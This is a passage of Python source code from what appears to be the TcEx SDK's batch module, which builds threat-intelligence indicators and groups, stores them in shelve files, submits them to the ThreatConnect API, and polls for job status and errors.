None:\n indicator_data['intValue1'] = size\n if indicator_data.get('type') == 'Host':\n # convert custom field name to the appropriate value for batch v2\n dns_active = indicator_data.pop('dnsActive', None)\n if dns_active is not None:\n indicator_data['flag1'] = dns_active\n whois_active = indicator_data.pop('whoisActive', None)\n if whois_active is not None:\n indicator_data['flag2'] = whois_active\n return self._indicator(indicator_data)\n\n def address(self, ip, **kwargs):\n \"\"\"Add Address data to Batch object.\n\n Args:\n ip (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Address.\n \"\"\"\n indicator_obj = Address(ip, **kwargs)\n return self._indicator(indicator_obj)\n\n def adversary(self, name, **kwargs):\n \"\"\"Add Adversary data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Adversary.\n \"\"\"\n group_obj = Adversary(name, **kwargs)\n return self._group(group_obj)\n\n def asn(self, as_number, **kwargs):\n \"\"\"Add ASN data to Batch object.\n\n Args:\n as_number (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of ASN.\n \"\"\"\n indicator_obj = ASN(as_number, **kwargs)\n return self._indicator(indicator_obj)\n\n @property\n def attribute_write_type(self):\n \"\"\"Return batch attribute write type.\"\"\"\n return self._attribute_write_type\n\n @attribute_write_type.setter\n def attribute_write_type(self, attribute_write_type):\n \"\"\"Set batch attribute write type.\"\"\"\n self._attribute_write_type = attribute_write_type\n\n def campaign(self, name, **kwargs):\n \"\"\"Add Campaign data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n first_seen (str, kwargs): The first seen datetime expression for this Group.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Campaign.\n \"\"\"\n group_obj = Campaign(name, **kwargs)\n return self._group(group_obj)\n\n def cidr(self, block, **kwargs):\n \"\"\"Add CIDR data to Batch object.\n\n Args:\n block (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of CIDR.\n \"\"\"\n indicator_obj = CIDR(block, **kwargs)\n return self._indicator(indicator_obj)\n\n def close(self):\n \"\"\"Cleanup batch job.\"\"\"\n self.groups_shelf.close()\n self.indicators_shelf.close()\n if self.debug and self.enable_saved_file:\n fqfn = os.path.join(self.tcex.args.tc_temp_path, 'xids-saved')\n if os.path.isfile(fqfn):\n os.remove(fqfn) # remove previous file to prevent duplicates\n with open(fqfn, 'w') as fh:\n for xid in self.saved_xids:\n fh.write(f'{xid}\\n')\n else:\n # delete saved files\n if os.path.isfile(self.group_shelf_fqfn):\n os.remove(self.group_shelf_fqfn)\n if os.path.isfile(self.group_shelf_fqfn):\n os.remove(self.indicator_shelf_fqfn)\n\n @property\n def data(self):\n \"\"\"Return the batch data to be sent to the ThreatConnect API.\n\n **Processing Order:**\n * Process groups in memory up to max batch size.\n * Process groups in shelf to max batch size.\n * Process indicators in memory up to max batch size.\n * Process indicators in shelf up to max batch size.\n\n This method will remove the group/indicator from memory and/or shelf.\n \"\"\"\n entity_count = 0\n data = {'group': [], 'indicator': []}\n # process group data\n group_data, entity_count = self.data_groups(self.groups, entity_count)\n data['group'].extend(group_data)\n if entity_count >= self._batch_max_chunk:\n return data\n group_data, entity_count = self.data_groups(self.groups_shelf, entity_count)\n data['group'].extend(group_data)\n if entity_count >= self._batch_max_chunk:\n return data\n\n # process indicator data\n indicator_data, entity_count = self.data_indicators(self.indicators, entity_count)\n data['indicator'].extend(indicator_data)\n if entity_count >= self._batch_max_chunk:\n return data\n indicator_data, entity_count = self.data_indicators(self.indicators_shelf, entity_count)\n data['indicator'].extend(indicator_data)\n if entity_count >= self._batch_max_chunk:\n return data\n return data\n\n def data_group_association(self, xid):\n \"\"\"Return group dict array following all associations.\n\n Args:\n xid (str): The xid of the group to retrieve associations.\n\n Returns:\n list: A list of group dicts.\n \"\"\"\n groups = []\n\n xids = deque()\n xids.append(xid)\n\n while xids:\n xid = xids.popleft() # remove current xid\n group_data = None\n\n if xid in self.groups:\n group_data = self.groups.get(xid)\n del self.groups[xid]\n elif xid in self.groups_shelf:\n group_data = self.groups_shelf.get(xid)\n del self.groups_shelf[xid]\n\n if group_data:\n group_data = self.data_group_type(group_data)\n groups.append(group_data)\n xids.extend(group_data.get('associatedGroupXid', []))\n\n return groups\n\n def data_group_type(self, group_data):\n \"\"\"Return dict representation of group data.\n\n Args:\n group_data (dict|obj): The group data dict or object.\n\n Returns:\n dict: The group data in dict format.\n \"\"\"\n if isinstance(group_data, dict):\n # process file content\n file_content = group_data.pop('fileContent', None)\n if file_content is not None:\n self._files[group_data.get('xid')] = {\n 'fileContent': file_content,\n 'fileName': group_data.get('fileName'),\n 'type': group_data.get('type'),\n }\n else:\n # process file content\n if group_data.data.get('type') in ['Document', 'Report']:\n self._files[group_data.data.get('xid')] = group_data.file_data\n group_data = group_data.data\n return group_data\n\n def data_groups(self, groups, entity_count):\n \"\"\"Process Group data.\n\n Args:\n groups (list): The list of groups to process.\n\n Returns:\n list: A list of groups including associations\n \"\"\"\n data = []\n # process group objects\n # we are converting groups.keys() to a list because the data_group_association function\n # will be deleting items the groups dictionary which would raise a\n # \"dictionary changed size during iteration\" error\n for xid in list(groups.keys()):\n # get association from group data\n assoc_group_data = self.data_group_association(xid)\n data += assoc_group_data\n entity_count += len(assoc_group_data)\n\n if entity_count >= self._batch_max_chunk:\n break\n return data, entity_count\n\n def data_indicators(self, indicators, entity_count):\n \"\"\"Process Indicator data.\"\"\"\n data = []\n # process indicator objects\n for xid, indicator_data in list(indicators.items()):\n entity_count += 1\n if isinstance(indicator_data, dict):\n data.append(indicator_data)\n else:\n data.append(indicator_data.data)\n del indicators[xid]\n if entity_count >= self._batch_max_chunk:\n break\n return data, entity_count\n\n @property\n def debug(self):\n \"\"\"Return debug setting\"\"\"\n debug = False\n if os.path.isfile(os.path.join(self.tcex.args.tc_temp_path, 'DEBUG')):\n debug = True\n return debug\n\n def document(self, name, file_name, **kwargs):\n \"\"\"Add Document data to Batch object.\n\n Args:\n name (str): The name for this Group.\n file_name (str): The name for the attached file for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n file_content (str;method, kwargs): The file contents or callback method to retrieve\n file content.\n malware (bool, kwargs): If true the file is considered malware.\n password (bool, kwargs): If malware is true a password for the zip archive is\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Document.\n \"\"\"\n group_obj = Document(name, file_name, **kwargs)\n return self._group(group_obj)\n\n def email(self, name, subject, header, body, **kwargs):\n \"\"\"Add Email data to Batch object.\n\n Args:\n name (str): The name for this Group.\n subject (str): The subject for this Email.\n header (str): The header for this Email.\n body (str): The body for this Email.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n from_addr (str, kwargs): The **from** address for this Email.\n to_addr (str, kwargs): The **to** address for this Email.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Email.\n \"\"\"\n group_obj = Email(name, subject, header, body, **kwargs)\n return self._group(group_obj)\n\n def email_address(self, address, **kwargs):\n \"\"\"Add Email Address data to Batch object.\n\n Args:\n address (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of EmailAddress.\n \"\"\"\n indicator_obj = EmailAddress(address, **kwargs)\n return self._indicator(indicator_obj)\n\n @property\n def error_codes(self):\n \"\"\"Return static list of Batch error codes and short description\"\"\"\n return {\n '0x1001': 'General Error',\n '0x1002': 'Permission Error',\n '0x1003': 'JsonSyntax Error',\n '0x1004': 'Internal Error',\n '0x1005': 'Invalid Indicator Error',\n '0x1006': 'Invalid Group Error',\n '0x1007': 'Item Not Found Error',\n '0x1008': 'Indicator Limit Error',\n '0x1009': 'Association Error',\n '0x100A': 'Duplicate Item Error',\n '0x100B': 'File IO Error',\n '0x2001': 'Indicator Partial Loss Error',\n '0x2002': 'Group Partial Loss Error',\n '0x2003': 'File Hash Merge Error',\n }\n\n def errors(self, batch_id, halt_on_error=True):\n \"\"\"Retrieve Batch errors to ThreatConnect API.\n\n .. code-block:: javascript\n\n [{\n \"errorReason\": \"Incident incident-001 has an invalid status.\",\n \"errorSource\": \"incident-001 is not valid.\"\n }, {\n \"errorReason\": \"Incident incident-002 has an invalid status.\",\n \"errorSource\":\"incident-002 is not valid.\"\n }]\n\n Args:\n batch_id (str): The ID returned from the ThreatConnect API for the current batch job.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n \"\"\"\n errors = []\n try:\n r = self.tcex.session.get(f'/v2/batch/{batch_id}/errors')\n # if r.status_code == 404:\n # time.sleep(5) # allow time for errors to be processed\n # r = self.tcex.session.get(f'/v2/batch/{batch_id}/errors')\n self.tcex.log.debug(\n f'Retrieve Errors for ID {batch_id}: status code {r.status_code}, errors {r.text}'\n )\n # self.tcex.log.debug(f'Retrieve Errors URL {r.url}')\n # API does not return correct content type\n if r.ok:\n errors = json.loads(r.text)\n # temporarily process errors to find \"critical\" errors.\n # FR in core to return error codes.\n for error in errors:\n error_reason = error.get('errorReason')\n for error_msg in self._critical_failures:\n if re.findall(error_msg, error_reason):\n self.tcex.handle_error(10500, [error_reason], halt_on_error)\n return errors\n except Exception as e:\n self.tcex.handle_error(560, [e], halt_on_error)\n\n def event(self, name, **kwargs):\n \"\"\"Add Event data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n event_date (str, kwargs): The event datetime expression for this Group.\n status (str, kwargs): The status for this Group.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Event.\n \"\"\"\n group_obj = Event(name, **kwargs)\n return self._group(group_obj)\n\n def file(self, md5=None, sha1=None, sha256=None, **kwargs):\n \"\"\"Add File data to Batch object.\n\n .. note:: A least one file hash value must be specified.\n\n Args:\n md5 (str, optional): The md5 value for this Indicator.\n sha1 (str, optional): The sha1 value for this Indicator.\n sha256 (str, optional): The sha256 value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n size (str, kwargs): The file size for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of File.\n\n \"\"\"\n indicator_obj = File(md5, sha1, sha256, **kwargs)\n return self._indicator(indicator_obj)\n\n def file_merge_mode(self, value):\n \"\"\"Set the file merge mode for the entire batch job.\n\n Args:\n value (str): A value of Distribute or Merge.\n \"\"\"\n self._file_merge_mode = value\n\n @property\n def files(self):\n \"\"\"Return dictionary containing all of the file content or callbacks.\"\"\"\n return self._files\n\n @staticmethod\n def generate_xid(identifier=None):\n \"\"\"Generate xid from provided identifiers.\n\n .. Important:: If no identifier is provided a unique xid will be returned, but it will\n not be reproducible. If a list of identifiers are provided they must be\n in the same order to generate a reproducible xid.\n\n Args:\n identifier (list|str): Optional *string* value(s) to be used to make a unique and\n reproducible xid.\n\n \"\"\"\n if identifier is None:\n identifier = str(uuid.uuid4())\n elif isinstance(identifier, list):\n identifier = '-'.join([str(i) for i in identifier])\n identifier = hashlib.sha256(identifier.encode('utf-8')).hexdigest()\n return hashlib.sha256(identifier.encode('utf-8')).hexdigest()\n\n def group(self, group_type, name, **kwargs):\n \"\"\"Add Group data to Batch object.\n\n Args:\n group_type (str): The ThreatConnect define Group type.\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Group.\n \"\"\"\n group_obj = Group(group_type, name, **kwargs)\n return self._group(group_obj)\n\n @property\n def group_shelf_fqfn(self):\n \"\"\"Return groups shelf fully qualified filename.\n\n For testing/debugging a previous shelf file can be copied into the tc_temp_path directory\n instead of creating a new shelf file.\n \"\"\"\n if self._group_shelf_fqfn is None:\n # new shelf file\n self._group_shelf_fqfn = os.path.join(\n self.tcex.args.tc_temp_path, f'groups-{str(uuid.uuid4())}'\n )\n\n # saved shelf file\n if self.saved_groups:\n self._group_shelf_fqfn = os.path.join(self.tcex.args.tc_temp_path, 'groups-saved')\n return self._group_shelf_fqfn\n\n @property\n def groups(self):\n \"\"\"Return dictionary of all Groups data.\"\"\"\n if self._groups is None:\n # plain dict, but could be something else in future\n self._groups = {}\n return self._groups\n\n @property\n def groups_shelf(self):\n \"\"\"Return dictionary of all Groups data.\"\"\"\n if self._groups_shelf is None:\n self._groups_shelf = shelve.open(self.group_shelf_fqfn, writeback=False)\n return self._groups_shelf\n\n @property\n def halt_on_error(self):\n \"\"\"Return batch halt on error setting.\"\"\"\n return self._halt_on_error\n\n @halt_on_error.setter\n def halt_on_error(self, halt_on_error):\n \"\"\"Set batch halt on error setting.\"\"\"\n self._halt_on_error = halt_on_error\n\n @property\n def halt_on_batch_error(self):\n \"\"\"Return halt on batch error value.\"\"\"\n return self._halt_on_batch_error\n\n @halt_on_batch_error.setter\n def halt_on_batch_error(self, value):\n \"\"\"Set batch halt on batch error value.\"\"\"\n if isinstance(value, bool):\n self._halt_on_batch_error = value\n\n @property\n def halt_on_file_error(self):\n \"\"\"Return halt on file post error value.\"\"\"\n return self._halt_on_file_error\n\n @halt_on_file_error.setter\n def halt_on_file_error(self, value):\n \"\"\"Set halt on file post error value.\"\"\"\n if isinstance(value, bool):\n self._halt_on_file_error = value\n\n @property\n def halt_on_poll_error(self):\n \"\"\"Return halt on poll error value.\"\"\"\n return self._halt_on_poll_error\n\n @halt_on_poll_error.setter\n def halt_on_poll_error(self, value):\n \"\"\"Set batch halt on poll error value.\"\"\"\n if isinstance(value, bool):\n self._halt_on_poll_error = value\n\n def hash_collision_mode(self, value):\n \"\"\"Set the file hash collision mode for the entire batch job.\n\n Args:\n value (str): A value of Split, IgnoreIncoming, IgnoreExisting, FavorIncoming,\n and FavorExisting.\n \"\"\"\n self._hash_collision_mode = value\n\n def host(self, hostname, **kwargs):\n \"\"\"Add Email Address data to Batch object.\n\n Args:\n hostname (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n dns_active (bool, kwargs): If True DNS active is enabled for this indicator.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n whois_active (bool, kwargs): If True WhoIs active is enabled for this indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Host.\n \"\"\"\n indicator_obj = Host(hostname, **kwargs)\n return self._indicator(indicator_obj)\n\n def incident(self, name, **kwargs):\n \"\"\"Add Incident data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n event_date (str, kwargs): The event datetime expression for this Group.\n status (str, kwargs): The status for this Group.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Incident.\n \"\"\"\n group_obj = Incident(name, **kwargs)\n return self._group(group_obj)\n\n def indicator(self, indicator_type, summary, **kwargs):\n \"\"\"Add Indicator data to Batch object.\n\n Args:\n indicator_type (str): The ThreatConnect define Indicator type.\n summary (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Indicator.\n \"\"\"\n indicator_obj = Indicator(indicator_type, summary, **kwargs)\n return self._indicator(indicator_obj)\n\n @property\n def indicator_shelf_fqfn(self):\n \"\"\"Return indicator shelf fully qualified filename.\n\n For testing/debugging a previous shelf file can be copied into the tc_temp_path directory\n instead of creating a new shelf file.\n \"\"\"\n if self._indicator_shelf_fqfn is None:\n # new shelf file\n self._indicator_shelf_fqfn = os.path.join(\n self.tcex.args.tc_temp_path, f'indicators-{str(uuid.uuid4())}'\n )\n\n # saved shelf file\n if self.saved_indicators:\n self._indicator_shelf_fqfn = os.path.join(\n self.tcex.args.tc_temp_path, 'indicators-saved'\n )\n return self._indicator_shelf_fqfn\n\n @property\n def indicators(self):\n \"\"\"Return dictionary of all Indicator data.\"\"\"\n if self._indicators is None:\n # plain dict, but could be something else in future\n self._indicators = {}\n return self._indicators\n\n @property\n def indicators_shelf(self):\n \"\"\"Return dictionary of all Indicator data.\"\"\"\n if self._indicators_shelf is None:\n self._indicators_shelf = shelve.open(self.indicator_shelf_fqfn, writeback=False)\n return self._indicators_shelf\n\n def intrusion_set(self, name, **kwargs):\n \"\"\"Add Intrusion Set data to Batch object.\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of IntrusionSet.\n \"\"\"\n group_obj = IntrusionSet(name, **kwargs)\n return self._group(group_obj)\n\n def mutex(self, mutex, **kwargs):\n \"\"\"Add Mutex data to Batch object.\n\n Args:\n mutex (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Mutex.\n \"\"\"\n indicator_obj = Mutex(mutex, **kwargs)\n return self._indicator(indicator_obj)\n\n def poll(self, batch_id, retry_seconds=None, back_off=None, timeout=None, halt_on_error=True):\n \"\"\"Poll Batch status to ThreatConnect API.\n\n .. code-block:: javascript\n\n {\n \"status\": \"Success\",\n \"data\": {\n \"batchStatus\": {\n \"id\":3505,\n \"status\":\"Completed\",\n \"errorCount\":0,\n \"successCount\":0,\n \"unprocessCount\":0\n }\n }\n }\n\n Args:\n batch_id (str): The ID returned from the ThreatConnect API for the current batch job.\n retry_seconds (int): The base number of seconds used for retries when job is not\n completed.\n back_off (float): A multiplier to use for backing off on each poll attempt when job has\n not completed.\n timeout (int, optional): The number of seconds before the poll should timeout.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n dict: The batch status returned from the ThreatConnect API.\n \"\"\"\n # check global setting for override\n if self.halt_on_poll_error is not None:\n halt_on_error = self.halt_on_poll_error\n\n # initial poll interval\n if self._poll_interval is None and self._batch_data_count is not None:\n # calculate poll_interval base off the number of entries in the batch data\n # with a minimum value of 5 seconds.\n self._poll_interval = max(math.ceil(self._batch_data_count / 300), 5)\n elif self._poll_interval is None:\n # if not able to calculate poll_interval default to 15 seconds\n self._poll_interval = 15\n\n # poll retry back_off factor\n if back_off is None:\n poll_interval_back_off = 2.5\n else:\n poll_interval_back_off = float(back_off)\n\n # poll retry seconds\n if retry_seconds is None:\n poll_retry_seconds = 5\n else:\n poll_retry_seconds = int(retry_seconds)\n\n # poll timeout\n if timeout is None:\n timeout = self.poll_timeout\n else:\n timeout = int(timeout)\n params = {'includeAdditional': 'true'}\n\n poll_count = 0\n poll_time_total = 0\n data = {}\n while True:\n poll_count += 1\n poll_time_total += self._poll_interval\n time.sleep(self._poll_interval)\n self.tcex.log.info(f'Batch poll time: {poll_time_total} seconds')\n try:\n # retrieve job status\n r = self.tcex.session.get(f'/v2/batch/{batch_id}', params=params)\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)\n return data\n data = r.json()\n if data.get('status') != 'Success':\n self.tcex.handle_error(545, [r.status_code, r.text], halt_on_error)\n except Exception as e:\n self.tcex.handle_error(540, [e], halt_on_error)\n\n if data.get('data', {}).get('batchStatus', {}).get('status') == 'Completed':\n # store last 5 poll times to use in calculating average poll time\n modifier = poll_time_total * 0.7\n self._poll_interval_times = self._poll_interval_times[-4:] + [modifier]\n\n weights = [1]\n poll_interval_time_weighted_sum = 0\n for poll_interval_time in self._poll_interval_times:\n poll_interval_time_weighted_sum += poll_interval_time * weights[-1]\n # weights will be [1, 1.5, 2.25, 3.375, 5.0625] for all 5 poll times depending\n # on how many poll times are available.\n weights.append(weights[-1] * 1.5)\n\n # pop off the last weight so its not added in to the sum\n weights.pop()\n\n # calculate the weighted average of the last 5 poll times\n self._poll_interval = math.floor(poll_interval_time_weighted_sum / sum(weights))\n\n if poll_count == 1:\n # if completed on first poll, reduce poll interval.\n self._poll_interval = self._poll_interval * 0.85\n\n self.tcex.log.debug(f'Batch Status: {data}')\n return data\n\n # update poll_interval for retry with max poll time of 20 seconds\n self._poll_interval = min(\n poll_retry_seconds + int(poll_count * poll_interval_back_off), 20\n )\n\n # time out poll to prevent App running indefinitely\n if poll_time_total >= timeout:\n self.tcex.handle_error(550, [timeout], True)\n\n @property\n def poll_timeout(self):\n \"\"\"Return current poll timeout value.\"\"\"\n return self._poll_timeout\n\n @poll_timeout.setter\n def poll_timeout(self, seconds):\n \"\"\"Set the poll timeout value.\"\"\"\n self._poll_timeout = int(seconds)\n\n def registry_key(self, key_name, value_name, value_type, **kwargs):\n \"\"\"Add Registry Key data to Batch object.\n\n Args:\n key_name (str): The key_name value for this Indicator.\n value_name (str): The value_name value for this Indicator.\n value_type (str): The value_type value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of Registry Key.\n \"\"\"\n indicator_obj = RegistryKey(key_name, value_name, value_type, **kwargs)\n return self._indicator(indicator_obj)\n\n def report(self, name, **kwargs):\n \"\"\"Add Report data to Batch object.\n\n Args:\n name (str): The name for this Group.\n file_name (str): The name for the attached file for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n file_content (str;method, kwargs): The file contents or callback method to retrieve\n file content.\n publish_date (str, kwargs): The publish datetime expression for this Group.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Report.\n \"\"\"\n group_obj = Report(name, **kwargs)\n return self._group(group_obj)\n\n def save(self, resource):\n \"\"\"Save group|indicator dict or object to shelve.\n\n Best effort to save group/indicator data to disk. If for any reason the save fails\n the data will still be accessible from list in memory.\n\n Args:\n resource (dict|obj): The Group or Indicator dict or object.\n \"\"\"\n resource_type = None\n xid = None\n if isinstance(resource, dict):\n resource_type = resource.get('type')\n xid = resource.get('xid')\n else:\n resource_type = resource.type\n xid = resource.xid\n\n if resource_type is not None and xid is not None:\n saved = True\n if resource_type in self.tcex.group_types:\n try:\n # groups\n self.groups_shelf[xid] = resource\n except Exception:\n saved = False\n\n if saved:\n try:\n del self._groups[xid]\n except KeyError:\n # if group was saved twice it would already be delete\n pass\n elif resource_type in self.tcex.indicator_types_data.keys():\n try:\n # indicators\n self.indicators_shelf[xid] = resource\n except Exception:\n saved = False\n\n if saved:\n try:\n del self._indicators[xid]\n except KeyError:\n # if indicator was saved twice it would already be delete\n pass\n\n @property\n def saved_groups(self):\n \"\"\"Return True if saved group files exits, else False.\"\"\"\n if self._saved_groups is None:\n self._saved_groups = False\n fqfn_saved = os.path.join(self.tcex.args.tc_temp_path, 'groups-saved')\n if (\n self.enable_saved_file\n and os.path.isfile(fqfn_saved)\n and os.access(fqfn_saved, os.R_OK)\n ):\n self._saved_groups = True\n self.tcex.log.debug('groups-saved file found')\n return self._saved_groups\n\n @property\n def saved_indicators(self):\n \"\"\"Return True if saved indicators files exits, else False.\"\"\"\n if self._saved_indicators is None:\n self._saved_indicators = False\n fqfn_saved = os.path.join(self.tcex.args.tc_temp_path, 'indicators-saved')\n if (\n self.enable_saved_file\n and os.path.isfile(fqfn_saved)\n and os.access(fqfn_saved, os.R_OK)\n ):\n self._saved_indicators = True\n self.tcex.log.debug('indicators-saved file found')\n return self._saved_indicators\n\n @property\n def saved_xids(self):\n \"\"\"Return previously saved xids.\"\"\"\n if self._saved_xids is None:\n self._saved_xids = []\n if self.debug:\n fpfn = os.path.join(self.tcex.args.tc_temp_path, 'xids-saved')\n if os.path.isfile(fpfn) and os.access(fpfn, os.R_OK):\n with open(fpfn) as fh:\n self._saved_xids = fh.read().splitlines()\n return self._saved_xids\n\n @property\n def settings(self):\n \"\"\"Return batch job settings.\"\"\"\n _settings = {\n 'action': self._action,\n # not supported in v2 batch\n # 'attributeWriteType': self._attribute_write_type,\n 'attributeWriteType': 'Replace',\n 'haltOnError': str(self._halt_on_error).lower(),\n 'owner': self._owner,\n 'version': 'V2',\n }\n if self._playbook_triggers_enabled is not None:\n _settings['playbookTriggersEnabled'] = str(self._playbook_triggers_enabled).lower()\n if self._hash_collision_mode is not None:\n _settings['hashCollisionMode'] = self._hash_collision_mode\n if self._file_merge_mode is not None:\n _settings['fileMergeMode'] = self._file_merge_mode\n return _settings\n\n def signature(self, name, file_name, file_type, file_text, **kwargs):\n \"\"\"Add Signature data to Batch object.\n\n Valid file_types:\n + Snort ®\n + Suricata\n + YARA\n + ClamAV ®\n + OpenIOC\n + CybOX ™\n + Bro\n + Regex\n + SPL - Splunk ® Search Processing Language\n\n Args:\n name (str): The name for this Group.\n file_name (str): The name for the attached signature for this Group.\n file_type (str): The signature type for this Group.\n file_text (str): The signature content for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Signature.\n \"\"\"\n group_obj = Signature(name, file_name, file_type, file_text, **kwargs)\n return self._group(group_obj)\n\n def submit(self, poll=True, errors=True, process_files=True, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\n\n By default this method will submit the job request and data and if the size of the data\n is below the value **synchronousBatchSaveLimit** set in System Setting it will process\n the request synchronously and return the batch status. If the size of the batch is greater\n than the value set the batch job will be queued.\n Errors are not retrieve automatically and need to be enabled.\n\n If any of the submit, poll, or error methods fail the entire submit will halt at the point\n of failure. The behavior can be changed by setting halt_on_error to False.\n\n Each of these methods can also be called on their own for greater control of the submit\n process.\n\n Args:\n poll (bool, default:True): Poll for status.\n errors (bool, default:True): Retrieve any batch errors (only if poll is True).\n process_files (bool, default:True): Send any document or report attachments to the API.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns.\n dict: The Batch Status from the ThreatConnect API.\n \"\"\"\n batch_data = (\n self.submit_create_and_upload(halt_on_error).get('data', {}).get('batchStatus', {})\n )\n batch_id = batch_data.get('id')\n if batch_id is not None:\n self.tcex.log.info(f'Batch ID: {batch_id}')\n # job hit queue\n if poll:\n # poll for status\n batch_data = (\n self.poll(batch_id, halt_on_error=halt_on_error)\n .get('data', {})\n .get('batchStatus')\n )\n if errors:\n # retrieve errors\n error_groups = batch_data.get('errorGroupCount', 0)\n error_indicators = batch_data.get('errorIndicatorCount', 0)\n if error_groups > 0 or error_indicators > 0:\n self.tcex.log.debug('retrieving batch errors')\n batch_data['errors'] = self.errors(batch_id)\n else:\n # can't process files if status is unknown (polling must be enabled)\n process_files = False\n\n if process_files:\n # submit file data after batch job is complete\n batch_data['uploadStatus'] = self.submit_files(halt_on_error)\n return batch_data\n\n def submit_all(self, poll=True, errors=True, process_files=True, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\n\n By default this method will submit the job request and data and if the size of the data\n is below the value **synchronousBatchSaveLimit** set in System Setting it will process\n the request synchronously and return the batch status. If the size of the batch is greater\n than the value set the batch job will be queued.\n Errors are not retrieve automatically and need to be enabled.\n\n If any of the submit, poll, or error methods fail the entire submit will halt at the point\n of failure. The behavior can be changed by setting halt_on_error to False.\n\n Each of these methods can also be called on their own for greater control of the submit\n process.\n\n Args:\n poll (bool, default:True): Poll for status.\n errors (bool, default:True): Retrieve any batch errors (only if poll is True).\n process_files (bool, default:True): Send any document or report attachments to the API.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns.\n dict: The Batch Status from the ThreatConnect API.\n \"\"\"\n batch_data_array = []\n while True:\n batch_data = {}\n batch_id = None\n if self.action.lower() == 'delete':\n # while waiting of FR for delete support in createAndUpload submit delete request\n # the old way (submit job + submit data), still using V2.\n if len(self) > 0: # pylint: disable=len-as-condition\n batch_id = self.submit_job(halt_on_error)\n if batch_id is not None:\n batch_data = self.submit_data(batch_id, halt_on_error)\n else:\n batch_data = {}\n else:\n batch_data = (\n self.submit_create_and_upload(halt_on_error)\n .get('data', {})\n .get('batchStatus', {})\n )\n batch_id = batch_data.get('id')\n\n # break loop when end of data is reached\n if not batch_data:\n break\n\n if batch_id is not None:\n self.tcex.log.info(f'Batch ID: {batch_id}')\n # job hit queue\n if poll:\n # poll for status\n batch_data = (\n self.poll(batch_id, halt_on_error=halt_on_error)\n .get('data', {})\n .get('batchStatus')\n )\n if errors:\n # retrieve errors\n error_count = batch_data.get('errorCount', 0)\n 